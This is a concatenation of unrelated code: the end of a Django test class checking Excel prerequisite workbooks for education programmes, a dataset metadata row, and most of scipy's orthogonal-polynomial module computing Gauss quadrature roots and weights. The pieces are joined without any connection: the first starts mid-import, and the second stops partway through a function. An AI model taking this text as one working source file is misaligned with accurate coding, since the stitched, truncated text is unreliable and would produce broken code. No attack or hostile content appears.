EducationGroupYearLearningUnitsIsPrerequisiteOfToExcel, _get_blocks_prerequisite_of
class TestGeneratePrerequisitesWorkbook(TestCase):
@classmethod
def setUpTestData(cls):
cls.education_group_year = EducationGroupYearFactory()
cls.child_leaves = GroupElementYearChildLeafFactory.create_batch(
6,
parent=cls.education_group_year
)
luy_acronyms = ["LCORS124" + str(i) for i in range(0, len(cls.child_leaves))]
for node, acronym in zip(cls.child_leaves, luy_acronyms):
node.child_leaf.acronym = acronym
node.child_leaf.save()
cls.luy_children = [child.child_leaf for child in cls.child_leaves]
PrerequisiteFactory(
learning_unit_year=cls.luy_children[0],
education_group_year=cls.education_group_year,
items__groups=(
(cls.luy_children[1],),
)
)
PrerequisiteFactory(
learning_unit_year=cls.luy_children[2],
education_group_year=cls.education_group_year,
items__groups=(
(cls.luy_children[3],),
(cls.luy_children[4], cls.luy_children[5])
)
)
cls.workbook_prerequisites = \
EducationGroupYearLearningUnitsPrerequisitesToExcel(cls.education_group_year)._to_workbook()
cls.workbook_is_prerequisite = \
EducationGroupYearLearningUnitsIsPrerequisiteOfToExcel(cls.education_group_year)._to_workbook()
cls.sheet_prerequisites = cls.workbook_prerequisites.worksheets[0]
cls.sheet_is_prerequisite = cls.workbook_is_prerequisite.worksheets[0]
def test_header_lines(self):
expected_headers = [
[self.education_group_year.acronym, self.education_group_year.title, _('Code'), _('Title'),
_('Cred. rel./abs.'), _('Block'), _('Mandatory')],
[_("Official"), None, None, None, None, None, None]
]
headers = [row_to_value(row) for row in self.sheet_prerequisites.iter_rows(range_string="A1:G2")]
self.assertListEqual(headers, expected_headers)
def test_when_learning_unit_year_has_one_prerequisite(self):
expected_content = [
[self.luy_children[0].acronym, self.luy_children[0].complete_title, None, None, None, None, None],
[_("has as prerequisite") + " :", '',
self.luy_children[1].acronym,
self.luy_children[1].complete_title_i18n,
"{} / {}".format(self.child_leaves[1].relative_credits, self.luy_children[1].credits),
str(self.child_leaves[1].block) if self.child_leaves[1].block else '',
_("Yes") if self.child_leaves[1].is_mandatory else _("No")]
]
content = [row_to_value(row) for row in self.sheet_prerequisites.iter_rows(range_string="A3:G4")]
self.assertListEqual(expected_content, content)
def test_when_learning_unit_year_has_multiple_prerequisites(self):
expected_content = [
[self.luy_children[2].acronym, self.luy_children[2].complete_title, None, None, None, None, None],
[_("has as prerequisite") + " :", '', self.luy_children[3].acronym,
self.luy_children[3].complete_title_i18n,
"{} / {}".format(self.child_leaves[3].relative_credits, self.luy_children[3].credits),
str(self.child_leaves[3].block) if self.child_leaves[3].block else '',
_("Yes") if self.child_leaves[3].is_mandatory else _("No")],
['', _(AND), "(" + self.luy_children[4].acronym, self.luy_children[4].complete_title_i18n,
"{} / {}".format(self.child_leaves[4].relative_credits, self.luy_children[4].credits),
str(self.child_leaves[4].block) if self.child_leaves[4].block else '',
_("Yes") if self.child_leaves[4].is_mandatory else _("No")
],
['', _(OR), self.luy_children[5].acronym + ")", self.luy_children[5].complete_title_i18n,
"{} / {}".format(self.child_leaves[5].relative_credits, self.luy_children[5].credits),
str(self.child_leaves[5].block) if self.child_leaves[5].block else '',
_("Yes") if self.child_leaves[5].is_mandatory else _("No")
]
]
content = [row_to_value(row) for row in self.sheet_prerequisites.iter_rows(range_string="A5:G8")]
self.assertListEqual(expected_content, content)
def test_get_blocks_prerequisite_of(self):
gey = GroupElementYearFactory(block=123)
self.assertEqual(_get_blocks_prerequisite_of(gey), '1 ; 2 ; 3')
gey = GroupElementYearFactory(block=1)
self.assertEqual(_get_blocks_prerequisite_of(gey), '1')
def row_to_value(sheet_row):
return [cell.value for cell in sheet_row]
| agpl-3.0 | 8,218,960,028,132,070,000 | 47.874074 | 110 | 0.637617 | false |
jakevdp/scipy | scipy/special/orthogonal.py | 1 | 58856 | """
A collection of functions to find the weights and abscissas for
Gaussian Quadrature.
These calculations are done by finding the eigenvalues of a
tridiagonal matrix whose entries are dependent on the coefficients
in the recursion formula for the orthogonal polynomials with the
corresponding weighting function over the interval.
Many recursion relations for orthogonal polynomials are given:
.. math::
a1n f_{n+1} (x) = (a2n + a3n x ) f_n (x) - a4n f_{n-1} (x)
The recursion relation of interest is
.. math::
P_{n+1} (x) = (x - A_n) P_n (x) - B_n P_{n-1} (x)
where :math:`P` has a different normalization than :math:`f`.
The coefficients can be found as:
.. math::
A_n = -a2n / a3n
\\qquad
B_n = ( a4n / a3n \\sqrt{h_n-1 / h_n})^2
where
.. math::
h_n = \\int_a^b w(x) f_n(x)^2
assume:
.. math::
P_0 (x) = 1
\\qquad
P_{-1} (x) == 0
For the mathematical background, see [golub.welsch-1969-mathcomp]_ and
[abramowitz.stegun-1965]_.
References
----------
.. [golub.welsch-1969-mathcomp]
Golub, Gene H, and John H Welsch. 1969. Calculation of Gauss
Quadrature Rules. *Mathematics of Computation* 23, 221-230+s1--s10.
.. [abramowitz.stegun-1965]
Abramowitz, Milton, and Irene A Stegun. (1965) *Handbook of
Mathematical Functions: with Formulas, Graphs, and Mathematical
Tables*. Gaithersburg, MD: National Bureau of Standards.
http://www.math.sfu.ca/~cbm/aands/
.. [townsend.trogdon.olver-2014]
Townsend, A. and Trogdon, T. and Olver, S. (2014)
*Fast computation of Gauss quadrature nodes and
weights on the whole real line*. :arXiv:`1410.5286`.
.. [townsend.trogdon.olver-2015]
Townsend, A. and Trogdon, T. and Olver, S. (2015)
*Fast computation of Gauss quadrature nodes and
weights on the whole real line*.
IMA Journal of Numerical Analysis
:doi:`10.1093/imanum/drv002`.
"""
#
# Author: Travis Oliphant 2000
# Updated Sep. 2003 (fixed bugs --- tested to be accurate)
from __future__ import division, print_function, absolute_import
# Scipy imports.
import numpy as np
from numpy import (exp, inf, pi, sqrt, floor, sin, cos, around, int,
hstack, arccos, arange)
from scipy import linalg
from scipy.special import airy
# Local imports.
from . import _ufuncs as cephes
_gam = cephes.gamma
from . import specfun
_polyfuns = ['legendre', 'chebyt', 'chebyu', 'chebyc', 'chebys',
'jacobi', 'laguerre', 'genlaguerre', 'hermite',
'hermitenorm', 'gegenbauer', 'sh_legendre', 'sh_chebyt',
'sh_chebyu', 'sh_jacobi']
# Correspondence between new and old names of root functions
_rootfuns_map = {'roots_legendre': 'p_roots',
'roots_chebyt': 't_roots',
'roots_chebyu': 'u_roots',
'roots_chebyc': 'c_roots',
'roots_chebys': 's_roots',
'roots_jacobi': 'j_roots',
'roots_laguerre': 'l_roots',
'roots_genlaguerre': 'la_roots',
'roots_hermite': 'h_roots',
'roots_hermitenorm': 'he_roots',
'roots_gegenbauer': 'cg_roots',
'roots_sh_legendre': 'ps_roots',
'roots_sh_chebyt': 'ts_roots',
'roots_sh_chebyu': 'us_roots',
'roots_sh_jacobi': 'js_roots'}
_evalfuns = ['eval_legendre', 'eval_chebyt', 'eval_chebyu',
'eval_chebyc', 'eval_chebys', 'eval_jacobi',
'eval_laguerre', 'eval_genlaguerre', 'eval_hermite',
'eval_hermitenorm', 'eval_gegenbauer',
'eval_sh_legendre', 'eval_sh_chebyt', 'eval_sh_chebyu',
'eval_sh_jacobi']
__all__ = _polyfuns + list(_rootfuns_map.keys()) + _evalfuns + ['poch', 'binom']
class orthopoly1d(np.poly1d):
def __init__(self, roots, weights=None, hn=1.0, kn=1.0, wfunc=None,
limits=None, monic=False, eval_func=None):
equiv_weights = [weights[k] / wfunc(roots[k]) for
k in range(len(roots))]
mu = sqrt(hn)
if monic:
evf = eval_func
if evf:
eval_func = lambda x: evf(x) / kn
mu = mu / abs(kn)
kn = 1.0
# compute coefficients from roots, then scale
poly = np.poly1d(roots, r=True)
np.poly1d.__init__(self, poly.coeffs * float(kn))
# TODO: In numpy 1.13, there is no need to use __dict__ to access attributes
self.__dict__['weights'] = np.array(list(zip(roots,
weights, equiv_weights)))
self.__dict__['weight_func'] = wfunc
self.__dict__['limits'] = limits
self.__dict__['normcoef'] = mu
# Note: eval_func will be discarded on arithmetic
self.__dict__['_eval_func'] = eval_func
def __call__(self, v):
if self._eval_func and not isinstance(v, np.poly1d):
return self._eval_func(v)
else:
return np.poly1d.__call__(self, v)
def _scale(self, p):
if p == 1.0:
return
try:
self._coeffs
except AttributeError:
self.__dict__['coeffs'] *= p
else:
# the coeffs attr is be made private in future versions of numpy
self._coeffs *= p
evf = self._eval_func
if evf:
self.__dict__['_eval_func'] = lambda x: evf(x) * p
self.__dict__['normcoef'] *= p
def _gen_roots_and_weights(n, mu0, an_func, bn_func, f, df, symmetrize, mu):
"""[x,w] = gen_roots_and_weights(n,an_func,sqrt_bn_func,mu)
Returns the roots (x) of an nth order orthogonal polynomial,
and weights (w) to use in appropriate Gaussian quadrature with that
orthogonal polynomial.
The polynomials have the recurrence relation
P_n+1(x) = (x - A_n) P_n(x) - B_n P_n-1(x)
an_func(n) should return A_n
sqrt_bn_func(n) should return sqrt(B_n)
mu ( = h_0 ) is the integral of the weight over the orthogonal
interval
"""
k = np.arange(n, dtype='d')
c = np.zeros((2, n))
c[0,1:] = bn_func(k[1:])
c[1,:] = an_func(k)
x = linalg.eigvals_banded(c, overwrite_a_band=True)
# improve roots by one application of Newton's method
y = f(n, x)
dy = df(n, x)
x -= y/dy
fm = f(n-1, x)
fm /= np.abs(fm).max()
dy /= np.abs(dy).max()
w = 1.0 / (fm * dy)
if symmetrize:
w = (w + w[::-1]) / 2
x = (x - x[::-1]) / 2
w *= mu0 / w.sum()
if mu:
return x, w, mu0
else:
return x, w
# Jacobi Polynomials 1 P^(alpha,beta)_n(x)
def roots_jacobi(n, alpha, beta, mu=False):
r"""Gauss-Jacobi quadrature.
Computes the sample points and weights for Gauss-Jacobi quadrature. The
sample points are the roots of the n-th degree Jacobi polynomial,
:math:`P^{\alpha, \beta}_n(x)`. These sample points and weights
correctly integrate polynomials of degree :math:`2n - 1` or less over the
interval :math:`[-1, 1]` with weight function
:math:`f(x) = (1 - x)^{\alpha} (1 + x)^{\beta}`.
Parameters
----------
n : int
quadrature order
alpha : float
alpha must be > -1
beta : float
beta must be > 0
mu : bool, optional
If True, return the sum of the weights, optional.
Returns
-------
x : ndarray
Sample points
w : ndarray
Weights
mu : float
Sum of the weights
See Also
--------
scipy.integrate.quadrature
scipy.integrate.fixed_quad
"""
m = int(n)
if n < 1 or n != m:
raise ValueError("n must be a positive integer.")
if alpha <= -1 or beta <= -1:
raise ValueError("alpha and beta must be greater than -1.")
if alpha == 0.0 and beta == 0.0:
return roots_legendre(m, mu)
if alpha == beta:
return roots_gegenbauer(m, alpha+0.5, mu)
mu0 = 2.0**(alpha+beta+1)*cephes.beta(alpha+1, beta+1)
a = alpha
b = beta
if a + b == 0.0:
an_func = lambda k: np.where(k == 0, (b-a)/(2+a+b), 0.0)
else:
an_func = lambda k: np.where(k == 0, (b-a)/(2+a+b),
(b*b - a*a) / ((2.0*k+a+b)*(2.0*k+a+b+2)))
bn_func = lambda k: 2.0 / (2.0*k+a+b)*np.sqrt((k+a)*(k+b) / (2*k+a+b+1)) \
* np.where(k == 1, 1.0, np.sqrt(k*(k+a+b) / (2.0*k+a+b-1)))
f = lambda n, x: cephes.eval_jacobi(n, a, b, x)
df = lambda n, x: 0.5 * (n + a + b + 1) \
* cephes.eval_jacobi(n-1, a+1, b+1, x)
return _gen_roots_and_weights(m, mu0, an_func, bn_func, f, df, False, mu)
def jacobi(n, alpha, beta, monic=False):
r"""Jacobi polynomial.
Defined to be the solution of
.. math::
(1 - x^2)\frac{d^2}{dx^2}P_n^{(\alpha, \beta)}
+ (\beta - \alpha - (\alpha + \beta + 2)x)
\frac{d}{dx}P_n^{(\alpha, \beta)}
+ n(n + \alpha + \beta + 1)P_n^{(\alpha, \beta)} = 0
for :math:`\alpha, \beta > -1`; :math:`P_n^{(\alpha, \beta)}` is a
polynomial of degree :math:`n`.
Parameters
----------
n : int
Degree of the polynomial.
alpha : float
Parameter, must be greater than -1.
beta : float
Parameter, must be greater than -1.
monic : bool, optional
If `True`, scale the leading coefficient to be 1. Default is
`False`.
Returns
-------
P : orthopoly1d
Jacobi polynomial.
Notes
-----
For fixed :math:`\alpha, \beta`, the polynomials
:math:`P_n^{(\alpha, \beta)}` are orthogonal over :math:`[-1, 1]`
with weight function :math:`(1 - x)^\alpha(1 + x)^\beta`.
"""
if n < 0:
raise ValueError("n must be nonnegative.")
wfunc = lambda x: (1 - x)**alpha * (1 + x)**beta
if n == 0:
return orthopoly1d([], [], 1.0, 1.0, wfunc, (-1, 1), monic,
eval_func=np.ones_like)
x, w, mu = roots_jacobi(n, alpha, beta, mu=True)
ab1 = alpha + beta + 1.0
hn = 2**ab1 / (2 * n + ab1) * _gam(n + alpha + 1)
hn *= _gam(n + beta + 1.0) / _gam(n + 1) / _gam(n + ab1)
kn = _gam(2 * n + ab1) / 2.0**n / _gam(n + 1) / _gam(n + ab1)
# here kn = coefficient on x^n term
p = orthopoly1d(x, w, hn, kn, wfunc, (-1, 1), monic,
lambda x: eval_jacobi(n, alpha, beta, x))
return p
# Jacobi Polynomials shifted G_n(p,q,x)
def roots_sh_jacobi(n, p1, q1, mu=False):
"""Gauss-Jacobi (shifted) quadrature.
Computes the sample points and weights for Gauss-Jacobi (shifted)
quadrature. The sample points are the roots of the n-th degree shifted
Jacobi polynomial, :math:`G^{p,q}_n(x)`. These sample points and weights
correctly integrate polynomials of degree :math:`2n - 1` or less over the
interval :math:`[0, 1]` with weight function
:math:`f(x) = (1 - x)^{p-q} x^{q-1}`
Parameters
----------
n : int
quadrature order
p1 : float
(p1 - q1) must be > -1
q1 : float
q1 must be > 0
mu : bool, optional
If True, return the sum of the weights, optional.
Returns
-------
x : ndarray
Sample points
w : ndarray
Weights
mu : float
Sum of the weights
See Also
--------
scipy.integrate.quadrature
scipy.integrate.fixed_quad
"""
if (p1-q1) <= -1 or q1 <= 0:
raise ValueError("(p - q) must be greater than -1, and q must be greater than 0.")
x, w, m = roots_jacobi(n, p1-q1, q1-1, True)
x = (x + 1) / 2
scale = 2.0**p1
w /= scale
m /= scale
if mu:
return x, w, m
else:
return x, w
def sh_jacobi(n, p, q, monic=False):
r"""Shifted Jacobi polynomial.
Defined by
.. math::
G_n^{(p, q)}(x)
= \binom{2n + p - 1}{n}^{-1}P_n^{(p - q, q - 1)}(2x - 1),
where :math:`P_n^{(\cdot, \cdot)}` is the nth Jacobi polynomial.
Parameters
----------
n : int
Degree of the polynomial.
p : float
Parameter, must have :math:`p > q - 1`.
q : float
Parameter, must be greater than 0.
monic : bool, optional
If `True`, scale the leading coefficient to be 1. Default is
`False`.
Returns
-------
G : orthopoly1d
Shifted Jacobi polynomial.
Notes
-----
For fixed :math:`p, q`, the polynomials :math:`G_n^{(p, q)}` are
orthogonal over :math:`[0, 1]` with weight function :math:`(1 -
x)^{p - q}x^{q - 1}`.
"""
if n < 0:
raise ValueError("n must be nonnegative.")
wfunc = lambda x: (1.0 - x)**(p - q) * (x)**(q - 1.)
if n == 0:
return orthopoly1d([], [], 1.0, 1.0, wfunc, (-1, 1), monic,
eval_func=np.ones_like)
n1 = n
x, w, mu0 = roots_sh_jacobi(n1, p, q, mu=True)
hn = _gam(n + 1) * _gam(n + q) * _gam(n + p) * _gam(n + p - q + 1)
hn /= (2 * n + p) * (_gam(2 * n + p)**2)
# kn = 1.0 in standard form so monic is redundant. Kept for compatibility.
kn = 1.0
pp = orthopoly1d(x, w, hn, kn, wfunc=wfunc, limits=(0, 1), monic=monic,
eval_func=lambda x: eval_sh_jacobi(n, p, q, x))
return pp
# Generalized Laguerre L^(alpha)_n(x)
def roots_genlaguerre(n, alpha, mu=False):
r"""Gauss-generalized Laguerre quadrature.
Computes the sample points and weights for Gauss-generalized Laguerre
quadrature. The sample points are the roots of the n-th degree generalized
Laguerre polynomial, :math:`L^{\alpha}_n(x)`. These sample points and
weights correctly integrate polynomials of degree :math:`2n - 1` or less
over the interval :math:`[0, \infty]` with weight function
:math:`f(x) = x^{\alpha} e^{-x}`.
Parameters
----------
n : int
quadrature order
alpha : float
alpha must be > -1
mu : bool, optional
If True, return the sum of the weights, optional.
Returns
-------
x : ndarray
Sample points
w : ndarray
Weights
mu : float
Sum of the weights
See Also
--------
scipy.integrate.quadrature
scipy.integrate.fixed_quad
"""
m = int(n)
if n < 1 or n != m:
raise ValueError("n must be a positive integer.")
if alpha < -1:
raise ValueError("alpha must be greater than -1.")
mu0 = cephes.gamma(alpha + 1)
if m == 1:
x = np.array([alpha+1.0], 'd')
w = np.array([mu0], 'd')
if mu:
return x, w, mu0
else:
return x, w
an_func = lambda k: 2 * k + alpha + 1
bn_func = lambda k: -np.sqrt(k * (k + alpha))
f = lambda n, x: cephes.eval_genlaguerre(n, alpha, x)
df = lambda n, x: (n*cephes.eval_genlaguerre(n, alpha, x)
- (n + alpha)*cephes.eval_genlaguerre(n-1, alpha, x))/x
return _gen_roots_and_weights(m, mu0, an_func, bn_func, f, df, False, mu)
def genlaguerre(n, alpha, monic=False):
r"""Generalized (associated) Laguerre polynomial.
Defined to be the solution of
.. math::
x\frac{d^2}{dx^2}L_n^{(\alpha)}
+ (\alpha + 1 - x)\frac{d}{dx}L_n^{(\alpha)}
+ nL_n^{(\alpha)} = 0,
where :math:`\alpha > -1`; :math:`L_n^{(\alpha)}` is a polynomial
of degree :math:`n`.
Parameters
----------
n : int
Degree of the polynomial.
alpha : float
Parameter, must be greater than -1.
monic : bool, optional
If `True`, scale the leading coefficient to be 1. Default is
`False`.
Returns
-------
L : orthopoly1d
Generalized Laguerre polynomial.
Notes
-----
For fixed :math:`\alpha`, the polynomials :math:`L_n^{(\alpha)}`
are orthogonal over :math:`[0, \infty)` with weight function
:math:`e^{-x}x^\alpha`.
The Laguerre polynomials are the special case where :math:`\alpha
= 0`.
See Also
--------
laguerre : Laguerre polynomial.
"""
if alpha <= -1:
raise ValueError("alpha must be > -1")
if n < 0:
raise ValueError("n must be nonnegative.")
if n == 0:
n1 = n + 1
else:
n1 = n
x, w, mu0 = roots_genlaguerre(n1, alpha, mu=True)
wfunc = lambda x: exp(-x) * x**alpha
if n == 0:
x, w = [], []
hn = _gam(n + alpha + 1) / _gam(n + 1)
kn = (-1)**n / _gam(n + 1)
p = orthopoly1d(x, w, hn, kn, wfunc, (0, inf), monic,
lambda x: eval_genlaguerre(n, alpha, x))
return p
# Laguerre L_n(x)
def roots_laguerre(n, mu=False):
r"""Gauss-Laguerre quadrature.
Computes the sample points and weights for Gauss-Laguerre quadrature.
The sample points are the roots of the n-th degree Laguerre polynomial,
:math:`L_n(x)`. These sample points and weights correctly integrate
polynomials of degree :math:`2n - 1` or less over the interval
:math:`[0, \infty]` with weight function :math:`f(x) = e^{-x}`.
Parameters
----------
n : int
quadrature order
mu : bool, optional
If True, return the sum of the weights, optional.
Returns
-------
x : ndarray
Sample points
w : ndarray
Weights
mu : float
Sum of the weights
See Also
--------
scipy.integrate.quadrature
scipy.integrate.fixed_quad
numpy.polynomial.laguerre.laggauss
"""
return roots_genlaguerre(n, 0.0, mu=mu)
def laguerre(n, monic=False):
r"""Laguerre polynomial.
Defined to be the solution of
.. math::
x\frac{d^2}{dx^2}L_n + (1 - x)\frac{d}{dx}L_n + nL_n = 0;
:math:`L_n` is a polynomial of degree :math:`n`.
Parameters
----------
n : int
Degree of the polynomial.
monic : bool, optional
If `True`, scale the leading coefficient to be 1. Default is
`False`.
Returns
-------
L : orthopoly1d
Laguerre Polynomial.
Notes
-----
The polynomials :math:`L_n` are orthogonal over :math:`[0,
\infty)` with weight function :math:`e^{-x}`.
"""
if n < 0:
raise ValueError("n must be nonnegative.")
if n == 0:
n1 = n + 1
else:
n1 = n
x, w, mu0 = roots_laguerre(n1, mu=True)
if n == 0:
x, w = [], []
hn = 1.0
kn = (-1)**n / _gam(n + 1)
p = orthopoly1d(x, w, hn, kn, lambda x: exp(-x), (0, inf), monic,
lambda x: eval_laguerre(n, x))
return p
# Hermite 1 H_n(x)
def roots_hermite(n, mu=False):
r"""Gauss-Hermite (physicst's) quadrature.
Computes the sample points and weights for Gauss-Hermite quadrature.
The sample points are the roots of the n-th degree Hermite polynomial,
:math:`H_n(x)`. These sample points and weights correctly integrate
polynomials of degree :math:`2n - 1` or less over the interval
:math:`[-\infty, \infty]` with weight function :math:`f(x) = e^{-x^2}`.
Parameters
----------
n : int
quadrature order
mu : bool, optional
If True, return the sum of the weights, optional.
Returns
-------
x : ndarray
Sample points
w : ndarray
Weights
mu : float
Sum of the weights
Notes
-----
For small n up to 150 a modified version of the Golub-Welsch
algorithm is used. Nodes are computed from the eigenvalue
problem and improved by one step of a Newton iteration.
The weights are computed from the well-known analytical formula.
For n larger than 150 an optimal asymptotic algorithm is applied
which computes nodes and weights in a numerically stable manner.
The algorithm has linear runtime making computation for very
large n (several thousand or more) feasible.
See Also
--------
scipy.integrate.quadrature
scipy.integrate.fixed_quad
numpy.polynomial.hermite.hermgauss
roots_hermitenorm
References
----------
.. [townsend.trogdon.olver-2014]
Townsend, A. and Trogdon, T. and Olver, S. (2014)
*Fast computation of Gauss quadrature nodes and
weights on the whole real line*. :arXiv:`1410.5286`.
.. [townsend.trogdon.olver-2015]
Townsend, A. and Trogdon, T. and Olver, S. (2015)
*Fast computation of Gauss quadrature nodes and
weights on the whole real line*.
IMA Journal of Numerical Analysis
:doi:`10.1093/imanum/drv002`.
"""
m = int(n)
if n < 1 or n != m:
raise ValueError("n must be a positive integer.")
mu0 = np.sqrt(np.pi)
if n <= 150:
an_func = lambda k: 0.0*k
bn_func = lambda k: np.sqrt(k/2.0)
f = cephes.eval_hermite
df = lambda n, x: 2.0 * n * cephes.eval_hermite(n-1, x)
return _gen_roots_and_weights(m, mu0, an_func, bn_func, f, df, True, mu)
else:
nodes, weights = _roots_hermite_asy(m)
if mu:
return nodes, weights, mu0
else:
return nodes, weights
def _compute_tauk(n, k, maxit=5):
"""Helper function for Tricomi initial guesses
For details, see formula 3.1 in lemma 3.1 in the
original paper.
Parameters
----------
n : int
Quadrature order
k : ndarray of type int
Index of roots :math:`\tau_k` to compute
maxit : int
Number of Newton maxit performed, the default
value of 5 is sufficient.
Returns
-------
tauk : ndarray
Roots of equation 3.1
See Also
--------
initial_nodes_a
roots_hermite_asy
"""
a = n % 2 - 0.5
c = (4.0*floor(n/2.0) - 4.0*k + 3.0)*pi / (4.0*floor(n/2.0) + 2.0*a + 2.0)
f = lambda x: x - sin(x) - c
df = lambda x: 1.0 - cos(x)
xi = 0.5*pi
for i in range(maxit):
xi = xi - f(xi)/df(xi)
return xi
def _initial_nodes_a(n, k):
r"""Tricomi initial guesses
Computes an initial approximation to the square of the `k`-th
(positive) root :math:`x_k` of the Hermite polynomial :math:`H_n`
of order :math:`n`. The formula is the one from lemma 3.1 in the
original paper. The guesses are accurate except in the region
near :math:`\sqrt{2n + 1}`.
Parameters
----------
n : int
Quadrature order
k : ndarray of type int
Index of roots to compute
Returns
-------
xksq : ndarray
Square of the approximate roots
See Also
--------
initial_nodes
roots_hermite_asy
"""
tauk = _compute_tauk(n, k)
sigk = cos(0.5*tauk)**2
a = n % 2 - 0.5
nu = 4.0*floor(n/2.0) + 2.0*a + 2.0
# Initial approximation of Hermite roots (square)
xksq = nu*sigk - 1.0/(3.0*nu) * (5.0/(4.0*(1.0-sigk)**2) - 1.0/(1.0-sigk) - 0.25)
return xksq
def _initial_nodes_b(n, k):
r"""Gatteschi initial guesses
Computes an initial approximation to the square of the `k`-th
(positive) root :math:`x_k` of the Hermite polynomial :math:`H_n`
of order :math:`n`. The formula is the one from lemma 3.2 in the
original paper. The guesses are accurate in the region just
below :math:`\sqrt{2n + 1}`.
Parameters
----------
n : int
Quadrature order
k : ndarray of type int
Index of roots to compute
Returns
-------
xksq : ndarray
Square of the approximate root
See Also
--------
initial_nodes
roots_hermite_asy
"""
a = n % 2 - 0.5
nu = 4.0*floor(n/2.0) + 2.0*a + 2.0
# Airy roots by approximation
ak = specfun.airyzo(k.max(), 1)[0][::-1]
# Initial approximation of Hermite roots (square)
xksq = (nu +
2.0**(2.0/3.0) * ak * nu**(1.0/3.0) +
1.0/5.0 * 2.0**(4.0/3.0) * ak**2 * nu**(-1.0/3.0) +
(9.0/140.0 - 12.0/175.0 * ak**3) * nu**(-1.0) +
(16.0/1575.0 * ak + 92.0/7875.0 * ak**4) * 2.0**(2.0/3.0) * nu**(-5.0/3.0) -
(15152.0/3031875.0 * ak**5 + 1088.0/121275.0 * ak**2) * 2.0**(1.0/3.0) * nu**(-7.0/3.0))
return xksq
def _initial_nodes(n):
"""Initial guesses for the Hermite roots
Computes an initial approximation to the non-negative
roots :math:`x_k` of the Hermite polynomial :math:`H_n`
of order :math:`n`. The Tricomi and Gatteschi initial
guesses are used in the region where they are accurate.
Parameters
----------
n : int
Quadrature order
Returns
-------
xk : ndarray
Approximate roots
See Also
--------
roots_hermite_asy
"""
# Turnover point
# linear polynomial fit to error of 10, 25, 40, ..., 1000 point rules
fit = 0.49082003*n - 4.37859653
turnover = around(fit).astype(int)
# Compute all approximations
ia = arange(1, int(floor(n*0.5)+1))
ib = ia[::-1]
xasq = _initial_nodes_a(n, ia[:turnover+1])
xbsq = _initial_nodes_b(n, ib[turnover+1:])
# Combine
iv = sqrt(hstack([xasq, xbsq]))
# Central node is always zero
if n % 2 == 1:
iv = hstack([0.0, iv])
return iv
def _pbcf(n, theta):
r"""Asymptotic series expansion of parabolic cylinder function
The implementation is based on sections 3.2 and 3.3 from the
original paper. Compared to the published version this code
adds one more term to the asymptotic series. The detailed
formulas can be found at [parabolic-asymptotics]_. The evaluation
is done in a transformed variable :math:`\theta := \arccos(t)`
where :math:`t := x / \mu` and :math:`\mu := \sqrt{2n + 1}`.
Parameters
----------
n : int
Quadrature order
theta : ndarray
Transformed position variable
Returns
-------
U : ndarray
Value of the parabolic cylinder function :math:`U(a, \theta)`.
Ud : ndarray
Value of the derivative :math:`U^{\prime}(a, \theta)` of
the parabolic cylinder function.
See Also
--------
roots_hermite_asy
References
----------
.. [parabolic-asymptotics]
http://dlmf.nist.gov/12.10#vii
"""
st = sin(theta)
ct = cos(theta)
# http://dlmf.nist.gov/12.10#vii
mu = 2.0*n + 1.0
# http://dlmf.nist.gov/12.10#E23
eta = 0.5*theta - 0.5*st*ct
# http://dlmf.nist.gov/12.10#E39
zeta = -(3.0*eta/2.0) ** (2.0/3.0)
# http://dlmf.nist.gov/12.10#E40
phi = (-zeta / st**2) ** (0.25)
# Coefficients
# http://dlmf.nist.gov/12.10#E43
a0 = 1.0
a1 = 0.10416666666666666667
a2 = 0.08355034722222222222
a3 = 0.12822657455632716049
a4 = 0.29184902646414046425
a5 = 0.88162726744375765242
b0 = 1.0
b1 = -0.14583333333333333333
b2 = -0.09874131944444444444
b3 = -0.14331205391589506173
b4 = -0.31722720267841354810
b5 = -0.94242914795712024914
# Polynomials
# http://dlmf.nist.gov/12.10#E9
# http://dlmf.nist.gov/12.10#E10
ctp = ct ** arange(16).reshape((-1,1))
u0 = 1.0
u1 = (1.0*ctp[3,:] - 6.0*ct) / 24.0
u2 = (-9.0*ctp[4,:] + 249.0*ctp[2,:] + 145.0) / 1152.0
u3 = (-4042.0*ctp[9,:] + 18189.0*ctp[7,:] - 28287.0*ctp[5,:] - 151995.0*ctp[3,:] - 259290.0*ct) / 414720.0
u4 = (72756.0*ctp[10,:] - 321339.0*ctp[8,:] - 154982.0*ctp[6,:] + 50938215.0*ctp[4,:] + 122602962.0*ctp[2,:] + 12773113.0) / 39813120.0
u5 = (82393456.0*ctp[15,:] - 617950920.0*ctp[13,:] + 1994971575.0*ctp[11,:] - 3630137104.0*ctp[9,:] + 4433574213.0*ctp[7,:]
- 37370295816.0*ctp[5,:] - 119582875013.0*ctp[3,:] - 34009066266.0*ct) / 6688604160.0
v0 = 1.0
v1 = (1.0*ctp[3,:] + 6.0*ct) / 24.0
v2 = (15.0*ctp[4,:] - 327.0*ctp[2,:] - 143.0) / 1152.0
v3 = (-4042.0*ctp[9,:] + 18189.0*ctp[7,:] - 36387.0*ctp[5,:] + 238425.0*ctp[3,:] + 259290.0*ct) / 414720.0
v4 = (-121260.0*ctp[10,:] + 551733.0*ctp[8,:] - 151958.0*ctp[6,:] - 57484425.0*ctp[4,:] - 132752238.0*ctp[2,:] - 12118727) / 39813120.0
v5 = (82393456.0*ctp[15,:] - 617950920.0*ctp[13,:] + 2025529095.0*ctp[11,:] - 3750839308.0*ctp[9,:] + 3832454253.0*ctp[7,:]
+ 35213253348.0*ctp[5,:] + 130919230435.0*ctp[3,:] + 34009066266*ct) / 6688604160.0
# Airy Evaluation (Bi and Bip unused)
Ai, Aip, Bi, Bip = airy(mu**(4.0/6.0) * zeta)
# Prefactor for U
P = 2.0*sqrt(pi) * mu**(1.0/6.0) * phi
# Terms for U
# http://dlmf.nist.gov/12.10#E42
phip = phi ** arange(6, 31, 6).reshape((-1,1))
A0 = b0*u0
A1 = (b2*u0 + phip[0,:]*b1*u1 + phip[1,:]*b0*u2) / zeta**3
A2 = (b4*u0 + phip[0,:]*b3*u1 + phip[1,:]*b2*u2 + phip[2,:]*b1*u3 + phip[3,:]*b0*u4) / zeta**6
B0 = -(a1*u0 + phip[0,:]*a0*u1) / zeta**2
B1 = -(a3*u0 + phip[0,:]*a2*u1 + phip[1,:]*a1*u2 + phip[2,:]*a0*u3) / zeta**5
B2 = -(a5*u0 + phip[0,:]*a4*u1 + phip[1,:]*a3*u2 + phip[2,:]*a2*u3 + phip[3,:]*a1*u4 + phip[4,:]*a0*u5) / zeta**8
# U
# http://dlmf.nist.gov/12.10#E35
U = P * (Ai * (A0 + A1/mu**2.0 + A2/mu**4.0) +
Aip * (B0 + B1/mu**2.0 + B2/mu**4.0) / mu**(8.0/6.0))
# Prefactor for derivative of U
Pd = sqrt(2.0*pi) * mu**(2.0/6.0) / phi
